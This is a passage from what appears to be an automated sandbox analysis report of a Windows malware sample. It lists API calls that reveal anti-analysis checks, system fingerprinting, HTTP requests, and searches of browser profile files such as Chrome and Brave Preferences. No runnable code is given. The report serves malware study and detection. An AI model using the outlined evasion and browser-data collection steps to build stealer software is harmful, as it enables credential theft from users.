                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00867190,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,00867190,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3511611419-0
                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                  Control-flow Graph

                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1494 401220-401247 call 4189b0 GlobalMemoryStatusEx 1497 401273-40127a 1494->1497 1498 401249-401271 call 41da00 * 2 1494->1498 1500 401281-401285 1497->1500 1498->1500 1502 401287 1500->1502 1503 40129a-40129d 1500->1503 1505 401292-401294 ExitProcess 1502->1505 1506 401289-401290 1502->1506 1506->1503 1506->1505
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                  • __aulldiv.LIBCMT ref: 00401258
                                                  • __aulldiv.LIBCMT ref: 00401266
                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1508 416af3 1509 416b0a 1508->1509 1511 416aba-416ad7 call 41aad0 OpenEventA 1509->1511 1512 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1509->1512 1517 416af5-416b04 CloseHandle Sleep 1511->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1511->1518 1517->1509 1518->1512
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00867190,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,00867190,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0086C060), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0086B718,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                  • String ID: ERROR$ERROR
                                                  • API String ID: 3287882509-2579291623
                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocComputerNameProcess
                                                  • String ID:
                                                  • API String ID: 4203777966-0
                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                  • String ID:
                                                  • API String ID: 1103761159-0
                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0083BBFE
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0083BC1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_83b000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: cd748ea0e53e3f8366a4fdff591c827f35a37bf7381ccff8ed8c5c0c8c53c714
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 04F06271200715ABDB203AF9988DA6AB6E8FF89725F100578E742E50C0DF70EC4646A1
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,00B20223,?,?), ref: 00B20E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B20223,?,?), ref: 00B20E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: d3d99cc04f1a8f684d5fd2d77414d8ee9fb87755c6d3df6a29803a24b718521b
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 21D0123154512877D7003A94DC09BCD7B5CDF09B62F008451FB0DD9081C770994047E5
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                  APIs
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                  • String ID:
                                                  • API String ID: 1004333139-0
                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0083B8E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_83b000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 107b9cf2daa8ba1edd3c361a4faf081801672d2dfa5e2f32f87dd8033c9401d0
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 5A112A79A00208EFDB01DF98C985E98BBF5EF08351F058094FA489B362D771EA50DB80
                                                  APIs
                                                  • wsprintfA.USER32 ref: 004138CC
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                  • API String ID: 1125553467-817767981
                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                  • API String ID: 3334442632-726946144
                                                  • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                  • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0041492C
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
